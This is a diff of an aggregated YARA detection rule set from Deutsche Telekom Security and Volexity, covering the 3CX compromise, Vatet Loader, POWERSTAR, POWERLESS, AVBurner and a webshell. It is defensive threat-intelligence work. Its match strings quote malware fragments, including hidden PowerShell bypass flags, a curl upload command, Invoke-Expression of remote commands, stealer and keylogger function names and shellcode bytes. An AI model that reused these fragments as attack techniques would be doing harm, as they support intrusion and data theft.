+		$sx1 = "-WindowStyle Hidden -ep bypass -file" ascii
+		$sx2 = "BEGINDATA" ascii
+		$sx3 = "GET %s HTTP/1.0" ascii
+		$s5 = "User-Agent:" ascii
+		$s8 = "ALLUSERSPROFILE" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 2 of ( $sx* ) ) or all of them
 }
-rule TELEKOM_SECURITY_Cn_Utf8_Windows_Terminal : CAPABILITY HACKTOOL
+rule TELEKOM_SECURITY_Vatet_Loader_Rufus_Backdoor : DEFRAY777
 {
 	meta:
-		description = "This is a (dirty) hack to display UTF-8 on Windows command prompt."
+		description = "Detects backdoored Rufus with Vatet Loader of Defray777"
 		author = "Thomas Barabosch, Deutsche Telekom Security"
-		id = "a1beee71-c526-58fb-a255-dba55ef7535b"
-		date = "2022-01-14"
-		modified = "2023-12-12"
-		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L59-L71"
+		id = "1f6fa228-300c-59de-b89c-3cbdce1b6374"
+		date = "2022-03-18"
+		modified = "2022-03-18"
+		reference = "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/defray777/vatet_loader.yar#L1-L27"
 		license_url = "N/A"
-		logic_hash = "4c91280c3d6d3b48c4ee11bf3d0c2baecee1368fbf3951c0a3bf386454c557cf"
-		score = 40
+		logic_hash = "3767398112759689078f992eb272cfec3e59f6d9ca30f8da68c2053e1217fd18"
+		score = 75
 		quality = 20
-		tags = "CAPABILITY, HACKTOOL"
+		tags = "DEFRAY777"
+		sharing = "TLP:WHITE"
+		hash_1 = "c9c1caae50459896a15dce30eaca91e49e875207054d98e32e16a3e203446569"
+		hash_2 = "0cb8fc89541969304f3bf806e938452b36348bdd0280fc8f4e9221993e745334"
+		in_memory = "False"
 
 	strings:
-		$a = " chcp 65001 " ascii wide
+		$payload_decryption = { 66 0F F8 C1 66 0F EF C2 66 0F F8 C1 }
+		$mz = "MZ" ascii
+		$rufus = "https://rufus.ie/" ascii
 
 	condition:
-		$a
+		$mz at 0 and $payload_decryption and $rufus
 }
 rule TELEKOM_SECURITY_Crylock_Binary : FILE
 {
@@ -153675,11 +154219,57 @@ rule TELEKOM_SECURITY_Crylock_Hta : FILE
 	condition:
 		filesize < 100KB and 8 of ( $s* )
 }
+rule TELEKOM_SECURITY_Get_Windows_Proxy_Configuration : CAPABILITY HACKTOOL
+{
+	meta:
+		description = "Queries Windows Registry for proxy configuration"
+		author = "Thomas Barabosch, Deutsche Telekom Security"
+		id = "b67b0b70-a95f-5c65-a522-ef4f41e36159"
+		date = "2022-01-14"
+		modified = "2023-12-12"
+		reference = "https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-ie-clientnetworkprotocolimplementation-hklmproxyserver"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L44-L57"
+		license_url = "N/A"
+		logic_hash = "db52782a56d42f6e460466ea46993490bbbceeb7422d45211f064edb2e37a8eb"
+		score = 75
+		quality = 70
+		tags = "CAPABILITY, HACKTOOL"
+
+	strings:
+		$a = "Software\\Microsoft\\Windows\\Currentversion\\Internet Settings" ascii wide
+		$b = "ProxyEnable" ascii wide
+		$c = "ProxyServer" ascii wide
+
+	condition:
+		all of them
+}
+rule TELEKOM_SECURITY_Cn_Utf8_Windows_Terminal : CAPABILITY HACKTOOL
+{
+	meta:
+		description = "This is a (dirty) hack to display UTF-8 on Windows command prompt."
+		author = "Thomas Barabosch, Deutsche Telekom Security"
+		id = "a1beee71-c526-58fb-a255-dba55ef7535b"
+		date = "2022-01-14"
+		modified = "2023-12-12"
+		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L59-L71"
+		license_url = "N/A"
+		logic_hash = "4c91280c3d6d3b48c4ee11bf3d0c2baecee1368fbf3951c0a3bf386454c557cf"
+		score = 40
+		quality = 20
+		tags = "CAPABILITY, HACKTOOL"
+
+	strings:
+		$a = " chcp 65001 " ascii wide
+
+	condition:
+		$a
+}
 /*
  * YARA Rule Set
  * Repository Name: Volexity
  * Repository: https://github.com/volexity/threat-intel
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 1ef34c2e4704d1e6e6768c2d6800863bbae05a0d
  * Number of Rules: 85
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -153697,1440 +154287,1318 @@ Redistribution and use in source and binary forms, with or without modification,
 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
  */
-rule VOLEXITY_Apt_Malware_Vbs_Basicstar_A : CHARMINGCYPRESS FILE MEMORY
+rule VOLEXITY_Apt_Ico_Uta0040_B64_C2 : UTA0040 FILE
 {
 	meta:
-		description = "VBS backdoor which bares architectural similarity to the POWERSTAR malware family."
+		description = "Detection of malicious ICO files used in 3CX compromise."
 		author = "threatintel@volexity.com"
-		id = "e790defe-2bd5-5629-8420-ce8091483589"
-		date = "2024-01-04"
-		modified = "2025-05-21"
-		reference = "TIB-20240111"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L68-L98"
+		id = "1efb6376-a362-5f03-b4d3-08cd7d634de6"
+		date = "2023-03-30"
+		modified = "2023-03-30"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L1-L31"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "977bb42553bb6585c8d0e1e89675644720ca9abf294eccd797e20d4bca516810"
+		logic_hash = "2667a36ce151c6e964f9ce9a6f587eedbffdd6ec76e451a23c5cfdd08248d15e"
 		score = 75
 		quality = 80
-		tags = "CHARMINGCYPRESS, FILE, MEMORY"
-		hash1 = "c6f91e5585c2cbbb8d06b7f239e30b271f04393df4fb81815f6556fa4c793bb0"
-		os = "win"
-		os_arch = "all"
-		report2 = "TIB-20240126"
-		scan_context = "file,memory"
-		severity = "critical"
+		tags = "UTA0040, FILE"
+		hash1 = "a541e5fc421c358e0a2b07bf4771e897fb5a617998aa4876e0e1baa5fbb8e25c"
+		memory_suitable = 0
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10037
-		version = 8
 
 	strings:
-		$s1 = "Base64Encode(EncSess)" ascii wide
-		$s2 = "StrReverse(PlainSess)" ascii wide
-		$s3 = "ComDecode, \"Module\"" ascii wide
-		$s4 = "ComDecode, \"SetNewConfig\"" ascii wide
-		$s5 = "ComDecode, \"kill\"" ascii wide
-		$magic = "cmd /C start /MIN curl --ssl-no-revoke -s -d " ascii wide
+		$IEND_dollar = {49 45 4e 44 ae 42 60 82 24}
+		$IEND_nodollar = {49 45 4e 44 ae 42 60 82 }
 
 	condition:
-		3 of ( $s* ) or $magic
+		uint16be( 0 ) == 0x0000 and filesize < 120KB and ( $IEND_dollar in ( filesize -500 .. filesize ) and not $IEND_nodollar in ( filesize -20 .. filesize ) and for any k in ( 1 .. #IEND_dollar ) : ( for all i in ( 1 .. 4 ) : ( uint8( @IEND_dollar [ k ] + !IEND_dollar [ k ] + i ) < 123 and uint8( @IEND_dollar [ k ] + !IEND_dollar [ k ] + i ) > 47 ) ) )
 }
-rule VOLEXITY_Apt_Malware_Ps1_Powerless_B : CHARMINGCYPRESS FILE MEMORY
+rule VOLEXITY_Apt_Mac_Iconic : UTA0040
 {
 	meta:
-		description = "Detects POWERLESS malware."
+		description = "Detects the MACOS version of the ICONIC loader."
 		author = "threatintel@volexity.com"
-		id = "e62703b5-32fb-5ceb-9f21-f52a4871f3d9"
-		date = "2023-10-25"
-		modified = "2024-01-29"
-		reference = "TIB-20231027"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L99-L156"
+		id = "6d702ed3-e5b9-5324-a06b-507c9231cc00"
+		date = "2023-03-30"
+		modified = "2023-03-30"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L32-L50"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "eb9d199c1f7c2a42d711c1a44ab13526787169c18a77ce988568525baca043ef"
+		logic_hash = "7b689c3931632b01869ac2f21a1edca0a5ca9007299fe7cd16962d6866c27558"
 		score = 75
-		quality = 78
-		tags = "CHARMINGCYPRESS, FILE, MEMORY"
-		hash1 = "62de7abb39cf4c47ff120c7d765749696a03f4fa4e3e84c08712bb0484306ae1"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		quality = 80
+		tags = "UTA0040"
+		hash1 = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
+		memory_suitable = 1
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9794
-		version = 5
 
 	strings:
-		$fun_1 = "function verifyClickStorke"
-		$fun_2 = "function ConvertTo-SHA256"
-		$fun_3 = "function Convert-Tobase" fullword
-		$fun_4 = "function Convert-Frombase" fullword
-		$fun_5 = "function Send-Httppacket"
-		$fun_6 = "function Generat-FetchCommand"
-		$fun_7 = "function Create-Fetchkey"
-		$fun_8 = "function Run-Uploader"
-		$fun_9 = "function Run-Shot" fullword
-		$fun_10 = "function ShotThis("
-		$fun_11 = "function File-Manager"
-		$fun_12 = "function zip-files"
-		$fun_13 = "function Run-Stealer"
-		$fun_14 = "function Run-Downloader"
-		$fun_15 = "function Run-Stro" fullword
-		$fun_16 = "function Run-Tele" fullword
-		$fun_17 = "function Run-Voice"
-		$s_1 = "if($commandtype -eq \"klg\")"
-		$s_2 = "$desrilizedrecievedcommand"
-		$s_3 = "$getAsyncKeyProto = @"
-		$s_4 = "$Global:BotId ="
-		$s_5 = "$targetCLSID = (Get-ScheduledTask | Where-Object TaskName -eq"
-		$s_6 = "$burl = \"$Global:HostAddress/"
-		$s_7 = "$hashString = [System.BitConverter]::ToString($hash).Replace('-','').ToLower()"
-		$s_8 = "$Global:UID = ((gwmi win32_computersystemproduct).uuid -replace '[^0-9a-z]').substring("
-		$s_9 = "$rawpacket = \"{`\"MId`\":`\"$Global:MachineID`\",`\"BotId`\":`\"$basebotid`\"}\""
-		$s_12 = "Runned Without any Error"
-		$s_13 = "$commandresponse = (Invoke-Expression $instruction -ErrorAction Stop) | Out-String"
-		$s_14 = "Operation started successfuly"
-		$s_15 = "$t_path = (Get-WmiObject Win32_Process -Filter \"name = '$process'\" | Select-Object CommandLine).CommandLine"
-		$s_16 = "?{ $_.DisplayName -match \"Telegram Desktop\" } | %{$app_path += $_.InstallLocation }"
-		$s_17 = "$chlids = get-ChildItem $t -Recurse -Exclude \"$t\\tdata\\user_data\""
-		$s_18 = "if($FirsttimeFlag -eq $True)"
-		$s_19 = "Update-Conf -interval $inter -url $url -next_url $next -conf_path $conf_path -key $config_key"
+		$str1 = "3CX Desktop App" xor(0x01-0xff)
+		$str2 = "__tutma=" xor(0x01-0xff)
+		$str3 = "Mozilla/5.0" xor(0x01-0xff)
 
 	condition:
-		3 of ( $fun_* ) or any of ( $s_* )
+		all of them
 }
-rule VOLEXITY_Apt_Malware_Macos_Vpnclient_Cc_Oct23 : CHARMINGCYPRESS FILE MEMORY
+rule VOLEXITY_Apt_Win_Iconicstealer : UTA0040
 {
 	meta:
-		description = "Detection for fake macOS VPN client used by CharmingCypress."
+		description = "Detect the ICONICSTEALER malware family."
 		author = "threatintel@volexity.com"
-		id = "e0957936-dc6e-5de6-bb23-d0ef61655029"
-		date = "2023-10-17"
-		modified = "2023-10-27"
-		reference = "TIB-20231027"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L245-L271"
+		id = "d7896506-6ce5-59b1-b24a-87ffdb2a5174"
+		date = "2023-03-30"
+		modified = "2023-03-30"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L51-L69"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "da5e9be752648b072a9aaeed884b8e1729a14841e33ed6633a0aaae1f11bd139"
+		logic_hash = "ed7731d2361e7d96a6a35f8359b61a2af049b16bc457cf870db8831e142aebe2"
 		score = 75
 		quality = 80
-		tags = "CHARMINGCYPRESS, FILE, MEMORY"
-		hash1 = "11f0e38d9cf6e78f32fb2d3376badd47189b5c4456937cf382b8a574dc0d262d"
-		os = "darwin,linux"
-		os_arch = "all"
-		parent_hash = "31ca565dcbf77fec474b6dea07101f4dd6e70c1f58398eff65e2decab53a6f33"
-		scan_context = "file,memory"
-		severity = "critical"
+		tags = "UTA0040"
+		hash1 = "8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423"
+		memory_suitable = 1
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9770
-		version = 3
 
 	strings:
-		$s1 = "networksetup -setsocksfirewallproxystate wi-fi off" ascii
-		$s2 = "networksetup -setsocksfirewallproxy wi-fi ___serverAdd___ ___portNum___; networksetup -setsocksfirewallproxystate wi-fi on" ascii
-		$s3 = "New file imported successfully." ascii
-		$s4 = "Error in importing the File." ascii
+		$str1 = "\\3CXDesktopApp\\config.json" wide
+		$str2 = "url, title FROM urls" wide
+		$str3 = "url, title FROM moz_places" wide
+
+	condition:
+		all of them
+}
+rule VOLEXITY_Apt_Win_Iconic : UTA0040
+{
+	meta:
+		description = "Detect the ICONIC loader."
+		author = "threatintel@volexity.com"
+		id = "e7d6fcc0-c830-5236-90fb-182c66873903"
+		date = "2023-03-30"
+		modified = "2023-03-30"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L70-L93"
+		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
+		logic_hash = "b62b1543c9af3afb8fc885f313e1a5d2fcb688657e3807cce72b31b56381681e"
+		score = 75
+		quality = 55
+		tags = "UTA0040"
+		hash1 = "f79c3b0adb6ec7bcc8bc9ae955a1571aaed6755a28c8b17b1d7595ee86840952"
+		memory_suitable = 1
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+
+	strings:
+		$internal_name = "samcli.dll"
+		$str1 = "gzip, deflate, br"
+		$str2 = "__tutma"
+		$str3 = "__tutmc"
+		$str4 = "ChainingModeGCM" wide
+		$str5 = "ChainingMode" wide
+		$str6 = "icon%d.ico" wide
+
+	condition:
+		all of them
+}
+rule VOLEXITY_Apt_Win_3Cx_Backdoored_Lib : UTA0040
+{
+	meta:
+		description = "Detects the malicious library delivered in the backdoored 3CX installer."
+		author = "threatintel@volexity.com"
+		id = "39270b93-830e-598f-a38e-fcc5050e4d30"
+		date = "2023-03-30"
+		modified = "2023-03-30"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L94-L133"
+		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
+		logic_hash = "40be2d46a318ff03724ea1f6628d78001c14c85a3ae6d032c0324ea849d707f2"
+		score = 75
+		quality = 80
+		tags = "UTA0040"
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		memory_suitable = 1
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+
+	strings:
+		$shellcode = {
+                        44 8D 4A ??
+                        44 8D 92 ?? ?? ?? ??
+                        45 85 C9
+                        45 0F 49 D1
+                        41 81 E2 00 FF FF FF
+                        41 F7 DA
+                        44 01 D2
+                        FF C2
+                        4C 63 CA
+                        46 8A 94 0C ?? ?? ?? ??
+                        45 00 D0
+                        45 0F B6 D8
+                        42 8A AC 1C ?? ?? ?? ??
+                        46 88 94 1C ?? ?? ?? ??
+                        42 88 AC 0C ?? ?? ?? ??
+                        42 02 AC 1C ?? ?? ?? ??
+                        44 0F B6 CD
+                        46 8A 8C 0C ?? ?? ?? ??
+                        45 30 0C 0E
+                        48 FF C1
+                        48 39 C8
+                        75 ??
+                }
 
 	condition:
-		2 of ( $s* )
+		all of them
 }
-rule VOLEXITY_Apt_Malware_Charmingcypress_Openvpn_Configuration : CHARMINGCYPRESS FILE
+rule VOLEXITY_Informational_Win_3Cx_Msi : UTA0040
 {
 	meta:
-		description = "Detection for a .ovpn file used in a malicious VPN client on victim machines by CharmingCypress."
+		description = "Detects 3CX installers created in March 2023, 3CX was known to be compromised at this time."
 		author = "threatintel@volexity.com"
-		id = "f39b2d7c-f0c5-5623-a114-02ba32469e59"
-		date = "2023-10-17"
-		modified = "2023-10-27"
-		reference = "TIB-20231027"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L272-L297"
+		id = "ac26e7b1-61eb-5074-bcda-46d714bdba4c"
+		date = "2023-03-30"
+		modified = "2023-03-30"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-30 3CX/indicators/rules.yar#L134-L152"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "f4c5f13ac75504b14def9c37d3a41c6eea4c45845d4b54c50030b1f00691e4bf"
+		logic_hash = "c04de2653ef587f27c7ebf058c6f6c345e16b67f36ccc4306bc49f8c4394728e"
 		score = 75
 		quality = 80
-		tags = "CHARMINGCYPRESS, FILE"
-		hash1 = "d6d043973d8843a82033368c785c362f51395b1a1d475fa4705aff3526e15268"
-		parent_hash = "31ca565dcbf77fec474b6dea07101f4dd6e70c1f58398eff65e2decab53a6f33"
-		os = "all"
-		os_arch = "all"
-		scan_context = "file"
-		severity = "high"
+		tags = "UTA0040"
+		hash1 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
+		memory_suitable = 0
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9769
-		version = 3
 
 	strings:
-		$remote = "remote-cert-tls server" ascii
-		$ip = "Ip: "
-		$tls = "<tls_auth>"
+		$cert = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
+		$app = "3CXDesktopApp.exe"
+		$data = "202303"
 
 	condition:
 		all of them
 }
-rule VOLEXITY_Apt_Delivery_Win_Charming_Openvpn_Client : CHARMINGCYPRESS FILE
+rule VOLEXITY_Apt_Malware_Win_Avburner : DEVIOUSBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects a fake OpenVPN client developed by CharmingCypress."
+		description = "Detects AVBurner based on a combination of API calls used, hard-coded strings and bytecode patterns."
 		author = "threatintel@volexity.com"
-		id = "b69fdd72-4a55-5e83-b754-401fe9339007"
-		date = "2023-10-17"
-		modified = "2023-10-27"
-		reference = "TIB-20231027"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L298-L322"
+		id = "1bde0861-4820-5bb1-98a3-516092c91be0"
+		date = "2023-01-02"
+		modified = "2024-08-16"
+		reference = "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-03-07 AVBurner/yara.yar#L1-L40"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "02596a62cb1ba17ecabef0ae93f434e4774b00422a6da2106a2bc4c59d2f8077"
+		hash = "4b1b1a1293ccd2c0fd51075de9376ebb55ab64972da785153fcb0a4eb523a5eb"
+		logic_hash = "56ff6c8a4b737959a1219699a0457de1f0c34fead4299033840fb23c56a0caad"
 		score = 75
 		quality = 80
-		tags = "CHARMINGCYPRESS, FILE"
-		hash1 = "2d99755d5cd25f857d6d3aa15631b69f570d20f95c6743574f3d3e3e8765f33c"
+		tags = "DEVIOUSBAMBOO, FILE, MEMORY"
 		os = "win"
 		os_arch = "all"
-		scan_context = "file"
+		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9768
-		version = 2
+		rule_id = 8780
+		version = 4
 
 	strings:
-		$s1 = "DONE!"
-		$s2 = "AppCore.dll"
-		$s3 = "ultralight@@"
+		$api1 = "PspCreateProcessNotifyRoutineAddress" wide
+		$api2 = "PspCreateThreadNotifyRoutineAddress" wide
+		$api3 = "PspLoadImageNotifyRoutineAddress" wide
+		$str1 = "\\\\.\\RTCORE64" wide
+		$str2 = "\\\\%ws/pipe/%ws" wide
+		$str3 = "CreateServerW Failed %u" wide
+		$str4 = "OpenSCManager Failed %u" wide
+		$str5 = "Get patternAddress" wide
+		$pattern1 = { 4C 8B F9 48 8D 0C C1 E8 }
+		$pattern2 = { 48 8D 0C DD 00 00 00 00  45 33 C0 49 03 CD 48 8B }
+		$pattern3 = { 48 8D 04 C1 48 89 45 70 48 8B C8 E8 }
+		$pattern4 = { 49 8D 0C FC 45 33 C0 48 8B D6 E8 00 00 00 00 00}
+		$pattern5 = { 45 33 C0 48 8D 0C D9 48 8B D7 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+		$pattern6 = { 41 0F BA 6D 00 0A BB 01 00 00 00 4C 8B F2 4C 8B F9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
 
 	condition:
-		all of ( $s* )
+		all of ( $api* ) or all of ( $str* ) or all of ( $pattern* )
 }
-rule VOLEXITY_Apt_Malware_Ps1_Powerstar_Generic : CHARMINGCYPRESS FILE MEMORY
+rule VOLEXITY_Apt_Win_Powerstar_Persistence_Batch : CHARMINGKITTEN
 {
 	meta:
-		description = "Detects POWERSTAR modules based on common HTTP functions used across modules."
+		description = "Detects the batch script used to persist PowerStar via Startup."
 		author = "threatintel@volexity.com"
-		id = "71a3e99d-e1c8-5ac1-abbc-2ba5cba80799"
-		date = "2023-06-02"
-		modified = "2024-01-26"
-		reference = "TIB-20240126"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-02-13 CharmingCypress/rules.yar#L323-L351"
+		id = "f3ed7b46-d80d-55b1-b6c7-6ea6569f199c"
+		date = "2023-05-16"
+		modified = "2023-09-20"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L1-L19"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "4da02190ffd16304eccbc0d12dfcc5637a6b785af0e3dc3dfcafcfe114597eb2"
+		logic_hash = "9c3a45b759516959eae1cdf8e73bf540b682c90359a6232aa4782a8d1fe15b7d"
 		score = 75
 		quality = 80
-		tags = "CHARMINGCYPRESS, FILE, MEMORY"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		tags = "CHARMINGKITTEN"
+		hash1 = "9777f106ac62829cd3cfdbc156100fe892cfc4038f4c29a076e623dc40a60872"
+		memory_suitable = 1
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9356
-		version = 3
 
 	strings:
-		$http1 = "Send_Upload" ascii wide
-		$http2 = "Send_Post_Data" ascii wide
-		$json1 = "{\"OS\":\"" ascii wide
-		$json2 = "{\"ComputerName\":\"' + $env:COMPUTERNAME + '\"}" ascii wide
-		$json3 = "{\"Token\"" ascii wide
-		$json4 = "{\"num\":\"" ascii wide
+		$s_1 = "e^c^h^o o^f^f"
+		$s_2 = "powershertxdll.ertxdxe"
+		$s_3 = "Get-Conrtxdtent -Prtxdath"
+		$s_4 = "%appdata%\\Microsrtxdoft\\Windortxdws\\"
+		$s_5 = "&(gcm i*x)$"
 
 	condition:
-		all of ( $http* ) or all of ( $json* )
+		3 of them
 }
-rule VOLEXITY_Apt_Webshell_Pl_Complyshell : UTA0178 FILE MEMORY
+rule VOLEXITY_Apt_Win_Powerstar_Memonly : CHARMINGKITTEN
 {
 	meta:
-		description = "Detection for the COMPLYSHELL webshell."
+		description = "Detects the initial stage of the memory only variant of PowerStar."
 		author = "threatintel@volexity.com"
-		id = "6b44b5bc-a75f-573c-b9c3-562b7874e408"
-		date = "2023-12-13"
-		modified = "2024-01-12"
-		reference = "TIB-20231215"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L3-L25"
+		id = "469fc433-da9e-55ed-99fb-9560ec86a179"
+		date = "2023-05-16"
+		modified = "2023-09-20"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L20-L65"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "ff46691f1add20cff30fe996e2fb199ce42408e86d5642a8a43c430f2245b1f5"
+		logic_hash = "d790ff204e4e8adeb3e887d9ebce743e958b523c48317d017487b1b0c6aebc11"
 		score = 75
-		quality = 80
-		tags = "UTA0178, FILE, MEMORY"
-		hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		quality = 78
+		tags = "CHARMINGKITTEN"
+		hash1 = "977cf5cc1d0c61b7364edcf397e5c67d910fac628c6c9a41cf9c73b3720ce67f"
+		memory_suitable = 1
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9995
-		version = 4
 
 	strings:
-		$s = "eval{my $c=Crypt::RC4->new("
+		$s_1 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($in.substring(3)))"
+		$s_2 = "[Convert]::ToByte(([Convert]::ToString(-bnot ($text_bytes[$i])"
+		$s_3 = "$Exec=[System.Text.Encoding]::UTF8.GetString($text_bytes)"
+		$s_4 = "((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})"
+		$f_1 = "function Gorjol{"
+		$f_2 = "Borjol \"$"
+		$f_3 = "Gorjol -text"
+		$f_4 = "function Borjoly{"
+		$f_6 = "$filename = $env:APPDATA+\"\\Microsoft\\Windows\\DocumentPreview.pdf\";"
